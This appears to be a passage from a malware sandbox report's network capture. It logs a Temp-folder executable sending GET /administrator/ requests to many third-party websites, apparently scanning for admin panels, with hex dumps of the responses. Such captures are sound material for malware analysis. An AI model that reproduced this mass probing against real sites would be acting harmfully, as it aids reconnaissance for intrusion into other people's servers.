                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.912333012 CET1286INData Raw: cb 88 64 97 e4 ad 30 0c c2 39 c1 79 70 d0 7a 7c 0f fe 89 69 fa f8 9d a5 ff e4 24 fe e9 8a 82 6b ae da a5 e2 9c 81 eb 68 82 f7 64 99 a5 fb 6e e3 90 93 e8 a7 ab e5 92 26 fb 05 27 21 cb 70 2e ec 13 fa 2c 0b 92 64 31 2e 08 5f c6 6c cf f8 52 ec 7f 14
                                                                                                                                                                                                                                                                                                                                Data Ascii: d09ypz|i$khdn&'!p.,d1._lRRyqoR~&sxpw!)X{]YwXm<pTS8PB*98 }{N11!#"W68Arp5>&kxZb
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.913949013 CET1286INData Raw: f3 22 03 c0 f8 23 0e ce 7f 31 b8 52 9c 2f db 60 90 3e df 8c 69 b6 97 ba 99 3d 52 82 12 18 93 f0 9e 54 ed e5 24 a2 0d 0a 32 45 30 0d 0a 27 12 7a ba 66 c1 74 d5 8d 5c fd 96 b7 89 c4 cf 30 6d 75 5e 22 71 51 91 69 db 2c 68 71 c3 5a 6e ea 30 8d fd 28
                                                                                                                                                                                                                                                                                                                                Data Ascii: "#1R/`>i=RT$2E0'zft\0mu^"qQi,hqZn0(bb~ Y p?X|~lr}g0"/lBU10ztEN6YSMC4}z8v%o<i;+qTC{b4>4UF3wYF
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.914096117 CET1286INData Raw: 90 a3 eb ff 7b 0b 20 7d f7 c8 9f b3 66 a2 84 15 00 6f d7 5e 82 26 9b 40 c3 21 a9 cf d0 70 4c 16 11 6b 28 4c 8d c1 03 f9 a3 fc 19 63 a0 aa 8a 1b 97 65 c4 6b 56 4c 6a d1 dd 95 9e 34 76 71 ec b7 2d ea fc 21 89 4c d1 9f c0 30 d6 9e 22 14 f6 16 91 8b
                                                                                                                                                                                                                                                                                                                                Data Ascii: { }fo^&@!pLk(LcekVLj4vq-!L0"5R~[NDeY8)9LtQDHO_@Gjp-RZN@XfJ"4Fa| O.O(vK)WR)gUD7wm|hHkEVI[)X}e4L<J;3 >R=SO7
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.914395094 CET1286INData Raw: 3f 72 d4 e5 38 9c 7c 1b 03 c0 47 0e d9 3f 2e 49 a7 0d 90 26 a1 fa 4d b5 89 d4 73 d4 ce e3 5c 9d 3b c2 9d e1 1a e0 36 b5 52 49 2c 5b 45 2a 8b a2 50 92 4b 12 a5 86 a9 51 a1 52 aa 82 bd 34 8a 15 d3 d2 65 a1 7c 67 bc d5 d1 bf a2 23 3f 80 00 40 07 68
                                                                                                                                                                                                                                                                                                                                Data Ascii: ?r8|G?.I&Ms\;6RI,[E*PKQR4e|g#?@h9uBA- |i"G$71M2bf8<{ft%.A6o5>evAy|AG}&xPq~|XQ%:~ko_bE?fA<Gi


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                52192.168.2.45389486.107.32.130805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.357100010 CET179OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elteconline.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.335370064 CET358INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-UA-Compatible: IE=edge
                                                                                                                                                                                                                                                                                                                                Expires: Thu, 21 Dec 2023 05:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                                                                                                                Location: http://www.elteconline.com/administrator/
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                53192.168.2.453923217.26.54.21805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.357259035 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elrocket.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.614666939 CET443INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: https://elrocket.com/administrator/
                                                                                                                                                                                                                                                                                                                                Content-Length: 243
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 6c 72 6f 63 6b 65 74 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://elrocket.com/administrator/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                54192.168.2.453927187.45.195.138805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.360057116 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: erikamoveis.com.br
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.558849096 CET921INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Data Raw: 33 30 32 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 72 65 71 75 69 72 65 28 5f 5f 44 49 52 5f 5f 2f 77 70 2d 62 6c 6f 67 2d 68 65 61 64 65 72 2e 70 68 70 29 20 5b 3c 61 20 68 72 65 66 3d 27 66 75 6e 63 74 69 6f 6e 2e 72 65 71 75 69 72 65 27 3e 66 75 6e 63 74 69 6f 6e 2e 72 65 71 75 69 72 65 3c 2f 61 3e 5d 3a 20 66 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 73 74 72 65 61 6d 3a 20 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 73 74 6f 72 61 67 65 2f 31 2f 66 31 2f 37 62 2f 65 72 69 6b 61 6d 6f 76 65 69 73 32 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 69 6e 64 65 78 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 32 30 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 72 65 71 75 69 72 65 28 5f 5f 44 49 52 5f 5f 2f 77 70 2d 62 6c 6f 67 2d 68 65 61 64 65 72 2e 70 68 70 29 20 5b 3c 61 20 68 72 65 66 3d 27 66 75 6e 63 74 69 6f 6e 2e 72 65 71 75 69 72 65 27 3e 66 75 6e 63 74 69 6f 6e 2e 72 65 71 75 69 72 65 3c 2f 61 3e 5d 3a 20 66 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 73 74 72 65 61 6d 3a 20 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 73 74 6f 72 61 67 65 2f 31 2f 66 31 2f 37 62 2f 65 72 69 6b 61 6d 6f 76 65 69 73 32 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 69 6e 64 65 78 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 32 30 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 72 65 71 75 69 72 65 28 29 20 5b 3c 61 20 68 72 65 66 3d 27 66 75 6e 63 74 69 6f 6e 2e 72 65 71 75 69 72 65 27 3e 66 75 6e 63 74 69 6f 6e 2e 72 65 71 75 69 72 65 3c 2f 61 3e 5d 3a 20 46 61 69 6c 65 64 20 6f 70 65 6e 69 6e 67 20 72 65 71 75 69 72 65 64 20 27 5f 5f 44 49 52 5f 5f 2f 77 70 2d 62 6c 6f 67 2d 68 65 61 64 65 72 2e 70 68 70 27 20 28 69 6e 63 6c 75 64 65 5f 70 61 74 68 3d 27 2e 3a 2f 75 73 72 2f 73 68 61 72 65 2f 70 65 61 72 27 29 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 73 74 6f 72 61 67 65 2f 31 2f 66 31 2f 37 62 2f 65 72 69 6b 61 6d 6f 76 65 69 73 32 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 69 6e 64 65 78 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 32 30 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 302<br /><b>Warning</b>: require(__DIR__/wp-blog-header.php) [<a href='function.require'>function.require</a>]: failed to open stream: No such file or directory in <b>/home/storage/1/f1/7b/erikamoveis2/public_html/index.php</b> on line <b>20</b><br /><br /><b>Warning</b>: require(__DIR__/wp-blog-header.php) [<a href='function.require'>function.require</a>]: failed to open stream: No such file or directory in <b>/home/storage/1/f1/7b/erikamoveis2/public_html/index.php</b> on line <b>20</b><br /><br /><b>Fatal error</b>: require() [<a href='function.require'>function.require</a>]: Failed opening required '__DIR__/wp-blog-header.php' (include_path='.:/usr/share/pear') in <b>/home/storage/1/f1/7b/erikamoveis2/public_html/index.php</b> on line <b>20</b><br />
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.559606075 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                55192.168.2.45389786.107.32.130805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.360694885 CET179OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elteconline.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.335639000 CET358INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-UA-Compatible: IE=edge
                                                                                                                                                                                                                                                                                                                                Expires: Thu, 21 Dec 2023 05:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                                                                                                                Location: http://www.elteconline.com/administrator/
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                56192.168.2.45392493.185.102.224805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.369229078 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: roland-sk.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.622468948 CET367INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: http://profisign-sk.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                57192.168.2.453845162.43.104.145805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.376758099 CET175OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: nakacho.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.754024982 CET334INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                                                                                                                                                                                                Location: https://nakacho.com/administrator/


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                58192.168.2.45392893.185.102.224805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.376877069 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: roland-sk.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.633861065 CET367INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: http://profisign-sk.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                59192.168.2.45397264.190.63.111805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.389199018 CET175OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: tsutomu.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.663779020 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                x-powered-by: PHP/8.1.17
                                                                                                                                                                                                                                                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_LUSKjZrXnB8W4Egy14wjEZQOJZMC0BGiF6jyu+zqLvcUHFC39lhbDtwkASa3U0zggqIFBcaKzJiJXLwiT49esw==
                                                                                                                                                                                                                                                                                                                                last-modified: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                x-cache-miss-from: parking-56c7b4c6cb-b5f4k
                                                                                                                                                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 32 42 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 59 e9 72 db 38 12 fe bf 4f c1 68 ca 5b c9 8c 28 51 a7 65 ca 4e 95 9d d8 b9 9c c3 13 7b 73 55 2a 05 92 a0 08 8b 24 18 02 d4 61 ad aa f6 35 f6 f5 f6 49 b6 01 90 14 49 51 8a 3d 35 56 d9 22 81 ee 46 1f 5f 77 03 f0 f1 a3 e7 ef 9f 5d 7f f9 70 ae 79 3c f0 9f 1e 8b bf 9a 8f c2 c9 49 03 87 0d 4d 73 10 47 3a 72 2c 9f da d3 29 5e 9e bc bd 98 cf 9f 5f 7d 79 fd 86 7e 7d e5 cd ec 77 a7 57 e7 67 67 57 a7 cf 3f ce 4f e7 1f 4f 5f 9f 9d be 0b 97 fe a7 79 77 76 f9 a5 ef dd 84 47 73 63 78 77 f5 c6 f2 de 9c b9 b3 db 8b 9b 67 cc b9 f0 ad e1 b5 73 e5 2d ac a3 3f 3f 7f fa 9c bc ea f3 5e c7 fe 83 8e dc 2f ef 67 6d 36 fa d9 b9 7c f1 61 82 7a cf cf 3b 97 6d fe f2 a6 7f 79 fe ee ed b3 d3 f9 f9 e9 e9 d5 c9 c9 8f cb 9b 8f 6f 6e bf c6 9f c3 b3 d1 a7 fe f9 64 d9 e9 cf 6f cf bf 5e bd 7f fd f5 ed 33 e3 ec 05 b9 18 de 2e 93 3f ee 7e 5e ce ec 9b 97 17 cf 7a 47 be 67 3d e7 f3 e9 e9 47 d4 bb 31 ee 26 93 9f af 2e ce 6c f4 e6 ee 35 79 fd f9 72 4e ae fb 47 98 cd 4f 4e c0 74 8c 9c a7 c7 01 e6 48 b3 3d 14 33 cc 4f 1a 09 77 f5 51 e3 e9 31 27 dc c7 4f 39 4b 38 0d 92 96 4d 83 7f 86 16 8b c6 ba fa ba f6 08 d3 e6 d8 62 84 63 0d 1e 5d 1a 6b 0c f9 f8 51 89 2a e5 d6 fe c4 8c 26 b1 8d 99 86 42 47 7b 15 02 75 80 38 a1 61 eb b8 ad d6 51 4a 84 28 c0 27 8d 19 c1 f3 88 c6 bc a1 d9 34 e4 38 04 a5 e6 c4 e1 de 89 83 67 c4 c6 ba 7c 69 92 90 70 82 7c 9d d9 b0 ec 49 a7 65 34 03 b4 20 41 12 14 46 12 86 63 f9 8a 2c 18 31 1a a5 65 1c cc ec 98 44 42 8d c2 4a 3b 0d d3 0a ae 10 13 4b b0 48 73 49 cc b8 34 ca c2 f0 a0 ac 94 3c c8 f7 35 ea 6a dc 03 29 1b 7b 05 d7 ff fe f3 df 18 6b 3e a5 53 12 4e 04 6d 4b bb 88 41 e6 04 87 38 46 be c6 69 44 6c 06 5f 5a 40 81 10 84 cc 3d c4 05 a7 36 a7 89 ef 68 78 11 61 9b 0b 02 97 c0 ca 1e 8e 71 b3 a4 9d 87 98 46 b8 50 a1 a5 7d c2 9a 47 23 2c d9 25 79 2e 0c 81 70 86 51 6c 7b a9 1e 8f c0 3f 3e 09
                                                                                                                                                                                                                                                                                                                                Data Ascii: 2B7Yr8Oh[(QeN{sU*$a5IIQ=5V"F_w]py<IMsG:r,)^_}y~}wWggW?OO_ywvGscxwgs-??^/gm6|az;myondo^3.?~^zGg=G1&.l5yrNGONtH=3OwQ1'O9K8Mbc]kQ*&BG{u8aQJ('48g|ip|Ie4 AFc,1eDBJ;KHsI4<5j){k>SNmKA8FiDl_Z@=6hxaqFP}G#,%y.pQl{?>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.663861990 CET1286INData Raw: a7 ff d0 d2 9f 18 fb 27 0d 02 ae 69 e4 43 7c 19 81 eb 48 80 26 b8 1d 85 93 cd 84 17 63 f7 a4 d1 6e 93 60 d2 62 d8 a1 11 8a 85 7d 42 9f 36 c7 41 e4 23 8e 59 db a7 13 ca da 62 fe 87 78 6c 49 11 ed a7 c7 8c 2f 01 04 b9 b0 f6 ef 8f b4 50 f8 cc 27 77
                                                                                                                                                                                                                                                                                                                                Data Ascii: 'iC|H&cn`b}B6A#YbxlI/P'we37B6[F}u]BmBXrG]-{fadqzt\g@~01^?\(4(q1K)qS$|hd'!4eMY{p.vFMxL
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.663949013 CET1286INData Raw: 79 90 01 60 fc 0c d9 cb 0f 14 8e 14 cb fd 36 94 48 ef 6f 46 3d db 43 dd 4c a7 04 eb 01 6c 93 d0 04 af f2 c3 89 4b 16 d8 19 a7 35 0b 76 57 9b 2d 57 b1 e5 0d 5c f1 a9 a6 6d 9a 97 ba 38 a8 c8 b4 cd 06 52 71 d5 5a 5e d6 a1 1e fb ae eb de 9b a5 5c 36
                                                                                                                                                                                                                                                                                                                                Data Ascii: y`6HoF=CLlK5vW-W\m8RqZ^\62>d=lUi\D{Nq\30"R)UQr3.)rj:-WOB~Xd,7+77#PVfnlP)QDnz
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.664021015 CET1286INData Raw: 08 bb c1 f7 84 37 9d 79 5a 4e 4d 92 76 39 1a d6 bf b7 01 3a 76 99 fe cb 9e 47 4a b3 02 40 77 ed 05 68 36 0b 38 73 4a f6 66 38 73 ce d0 23 76 26 31 33 06 8f c4 8f b6 6a 2c 04 d5 21 bf 71 9a 26 d6 66 bb 41 2d c6 dd 84 4a 0b 2f 8e fd be bb 32 7f 8c
                                                                                                                                                                                                                                                                                                                                Data Ascii: 7yZNMv9:vGJ@wh68sJf8s#v&13j,!q&fA-J/2b#s05)?5H$]? J#1ds(84F9n*n,nr%MOK(a>a'O*]Tj3R!A'{?w-f~6TDJkmJffMxF
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.664541960 CET1286INData Raw: e4 ab 87 c9 19 00 7a f4 e0 ff 60 36 47 86 a6 92 fd d9 5e fd 00 34 2f ef 7e ad fc 70 0b c3 cf bd e5 da f6 5e e0 d7 7f dc 78 b6 77 7e dc 02 ea fd 6f db 01 8b d9 62 72 33 61 cf 53 46 87 f6 88 87 b0 31 f2 9b 31 7f be 99 f3 e1 78 cc ec f9 78 46 59 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: z`6G^4/~p^xw~obr3aSF11xxFY0t8`Uh02u k7)QKGZbl4B]\'3_e~rq#PktB|{G%K$X}[wtM`w0:p,h
